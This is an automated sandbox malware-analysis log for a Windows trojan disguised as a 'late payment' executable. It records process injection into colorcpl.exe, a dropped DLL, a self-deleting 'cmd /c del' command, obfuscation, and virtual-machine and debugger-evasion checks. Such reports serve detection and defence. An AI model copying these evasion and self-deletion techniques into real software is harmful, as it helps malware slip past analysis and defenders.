Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579840 NtDelayExecution,LdrInitializeThunk, 16_2_04579840
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579860 NtQuerySystemInformation,LdrInitializeThunk, 16_2_04579860
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579540 NtReadFile,LdrInitializeThunk, 16_2_04579540
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579910 NtAdjustPrivilegesToken,LdrInitializeThunk, 16_2_04579910
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045795D0 NtClose,LdrInitializeThunk, 16_2_045795D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045799A0 NtCreateSection,LdrInitializeThunk, 16_2_045799A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579A50 NtCreateFile,LdrInitializeThunk, 16_2_04579A50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579650 NtQueryValueKey,LdrInitializeThunk, 16_2_04579650
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579660 NtAllocateVirtualMemory,LdrInitializeThunk, 16_2_04579660
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045796D0 NtCreateKey,LdrInitializeThunk, 16_2_045796D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045796E0 NtFreeVirtualMemory,LdrInitializeThunk, 16_2_045796E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579710 NtQueryInformationToken,LdrInitializeThunk, 16_2_04579710
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579FE0 NtCreateMutant,LdrInitializeThunk, 16_2_04579FE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579780 NtMapViewOfSection,LdrInitializeThunk, 16_2_04579780
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457B040 NtSuspendThread, 16_2_0457B040
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579820 NtEnumerateKey, 16_2_04579820
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045798F0 NtReadVirtualMemory, 16_2_045798F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045798A0 NtWriteVirtualMemory, 16_2_045798A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579950 NtQueueApcThread, 16_2_04579950
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579560 NtWriteFile, 16_2_04579560
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457AD30 NtSetContextThread, 16_2_0457AD30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579520 NtWaitForSingleObject, 16_2_04579520
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045799D0 NtCreateProcessEx, 16_2_045799D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045795F0 NtQueryInformationFile, 16_2_045795F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579670 NtQueryInformationProcess, 16_2_04579670
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579610 NtEnumerateValueKey, 16_2_04579610
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579A10 NtQuerySection, 16_2_04579A10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579A00 NtProtectVirtualMemory, 16_2_04579A00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579A20 NtResumeThread, 16_2_04579A20
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579A80 NtOpenDirectoryObject, 16_2_04579A80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579770 NtSetInformationFile, 16_2_04579770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457A770 NtOpenThread, 16_2_0457A770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579760 NtOpenProcess, 16_2_04579760
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457A710 NtOpenProcessToken, 16_2_0457A710
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579B00 NtSetValueKey, 16_2_04579B00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579730 NtQueryVirtualMemory, 16_2_04579730
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457A3B0 NtGetContextThread, 16_2_0457A3B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045797A0 NtUnmapViewOfSection, 16_2_045797A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B18680 NtReadFile, 16_2_02B18680
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B187B0 NtAllocateVirtualMemory, 16_2_02B187B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B18700 NtClose, 16_2_02B18700
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B185D0 NtCreateFile, 16_2_02B185D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B186FB NtClose, 16_2_02B186FB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1867A NtReadFile, 16_2_02B1867A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B185CA NtCreateFile, 16_2_02B185CA
Sample file is different than original file name gathered from version info
Source: pago atrasado.exe, 00000000.00000003.244765966.000000000F1B6000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
Source: pago atrasado.exe, 00000001.00000003.248962710.0000000000786000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
Source: pago atrasado.exe, 00000001.00000002.327286991.0000000002973000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamecolorcpl.exej% vs pago atrasado.exe
Source: C:\Users\user\Desktop\pago atrasado.exe File read: C:\Users\user\Desktop\pago atrasado.exe Jump to behavior
Source: pago atrasado.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pago atrasado.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
Source: C:\Users\user\Desktop\pago atrasado.exe Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pago atrasado.exe Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe' Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe' Jump to behavior
Source: C:\Users\user\Desktop\pago atrasado.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\pago atrasado.exe File created: C:\Users\user\AppData\Local\Temp\nsb7E27.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@12/5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar, 0_2_00402053
Source: C:\Users\user\Desktop\pago atrasado.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404292
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\pago atrasado.exe Unpacked PE file: 1.2.pago atrasado.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000A4F5 push ecx; ret 0_2_1000A508
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041B87C push eax; ret 1_2_0041B882
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041B812 push eax; ret 1_2_0041B818
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041B81B push eax; ret 1_2_0041B882
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041C951 push FFFFFFA3h; ret 1_2_0041C955
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00404F18 push edi; retf 1_2_00404F19
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041B7C5 push eax; ret 1_2_0041B818
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A1D0D1 push ecx; ret 1_2_00A1D0E4
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041B87C push eax; ret 1_1_0041B882
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041B812 push eax; ret 1_1_0041B818
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041B81B push eax; ret 1_1_0041B882
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041C951 push FFFFFFA3h; ret 1_1_0041C955
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0458D0D1 push ecx; ret 16_2_0458D0E4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1B812 push eax; ret 16_2_02B1B818
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1B81B push eax; ret 16_2_02B1B882
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1B87C push eax; ret 16_2_02B1B882
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1C951 push FFFFFFA3h; ret 16_2_02B1C955
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1B7C5 push eax; ret 16_2_02B1B818
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B04F18 push edi; retf 16_2_02B04F19

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\pago atrasado.exe File created: C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: /c del 'C:\Users\user\Desktop\pago atrasado.exe'
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: /c del 'C:\Users\user\Desktop\pago atrasado.exe' Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10008826 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_10008826
Source: C:\Users\user\Desktop\pago atrasado.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\pago atrasado.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pago atrasado.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002B08604 second address: 0000000002B0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002B0898E second address: 0000000002B08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5660 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 5860 Thread sleep time: -36000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004088C0 rdtsc 1_2_004088C0
Source: C:\Users\user\Desktop\pago atrasado.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00405E93 FindFirstFileA,FindClose, 0_2_00405E93
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054BD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671
Source: explorer.exe, 00000002.00000000.275739014.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.312138109.000000000113D000.00000004.00000020.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.275739014.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.312469410.00000000011B3000.00000004.00000020.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: explorer.exe, 00000002.00000000.312469410.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000002.00000000.275782564.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000000.315993694.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.275782564.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000002.00000000.290685274.0000000008BB0000.00000004.00000001.sdmp Binary or memory string: Prod_VMware_SATA*6
Source: explorer.exe, 00000002.00000000.276079077.0000000008BB0000.00000004.00000001.sdmp Binary or memory string: AProd_VMware_SATA*6

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000CDA2 IsDebuggerPresent, 0_2_1000CDA2
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100093E8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_100093E8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100098B2 GetProcessHeap, 0_2_100098B2
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004088C0 rdtsc 1_2_004088C0
Enables debug privileges
Source: C:\Users\user\Desktop\pago atrasado.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A402 mov eax, dword ptr fs:[00000030h] 0_2_1001A402
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A616 mov eax, dword ptr fs:[00000030h] 0_2_1001A616
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A6C7 mov eax, dword ptr fs:[00000030h] 0_2_1001A6C7
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A706 mov eax, dword ptr fs:[00000030h] 0_2_1001A706
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A744 mov eax, dword ptr fs:[00000030h] 0_2_1001A744
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A090AF mov eax, dword ptr fs:[00000030h] 1_2_00A090AF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9080 mov eax, dword ptr fs:[00000030h] 1_2_009C9080
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FF0BF mov ecx, dword ptr fs:[00000030h] 1_2_009FF0BF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FF0BF mov eax, dword ptr fs:[00000030h] 1_2_009FF0BF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FF0BF mov eax, dword ptr fs:[00000030h] 1_2_009FF0BF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A43884 mov eax, dword ptr fs:[00000030h] 1_2_00A43884
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A43884 mov eax, dword ptr fs:[00000030h] 1_2_00A43884
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C58EC mov eax, dword ptr fs:[00000030h] 1_2_009C58EC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A5B8D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00A5B8D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A5B8D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A5B8D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A5B8D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A5B8D0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h] 1_2_00A47016
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h] 1_2_00A47016
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A47016 mov eax, dword ptr fs:[00000030h] 1_2_00A47016
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h] 1_2_009F002D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h] 1_2_009F002D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h] 1_2_009F002D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h] 1_2_009F002D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F002D mov eax, dword ptr fs:[00000030h] 1_2_009F002D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h] 1_2_009DB02A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h] 1_2_009DB02A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h] 1_2_009DB02A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DB02A mov eax, dword ptr fs:[00000030h] 1_2_009DB02A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A94015 mov eax, dword ptr fs:[00000030h] 1_2_00A94015
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A94015 mov eax, dword ptr fs:[00000030h] 1_2_00A94015
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E0050 mov eax, dword ptr fs:[00000030h] 1_2_009E0050
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E0050 mov eax, dword ptr fs:[00000030h] 1_2_009E0050
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A82073 mov eax, dword ptr fs:[00000030h] 1_2_00A82073
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A91074 mov eax, dword ptr fs:[00000030h] 1_2_00A91074
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A469A6 mov eax, dword ptr fs:[00000030h] 1_2_00A469A6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2990 mov eax, dword ptr fs:[00000030h] 1_2_009F2990
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FA185 mov eax, dword ptr fs:[00000030h] 1_2_009FA185
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h] 1_2_00A451BE
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h] 1_2_00A451BE
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h] 1_2_00A451BE
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A451BE mov eax, dword ptr fs:[00000030h] 1_2_00A451BE
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EC182 mov eax, dword ptr fs:[00000030h] 1_2_009EC182
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F61A0 mov eax, dword ptr fs:[00000030h] 1_2_009F61A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F61A0 mov eax, dword ptr fs:[00000030h] 1_2_009F61A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A541E8 mov eax, dword ptr fs:[00000030h] 1_2_00A541E8
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009CB1E1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009CB1E1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 1_2_009CB1E1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h] 1_2_009C9100
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h] 1_2_009C9100
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9100 mov eax, dword ptr fs:[00000030h] 1_2_009C9100
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F513A mov eax, dword ptr fs:[00000030h] 1_2_009F513A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F513A mov eax, dword ptr fs:[00000030h] 1_2_009F513A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h] 1_2_009E4120
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h] 1_2_009E4120
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h] 1_2_009E4120
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 mov eax, dword ptr fs:[00000030h] 1_2_009E4120
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E4120 mov ecx, dword ptr fs:[00000030h] 1_2_009E4120
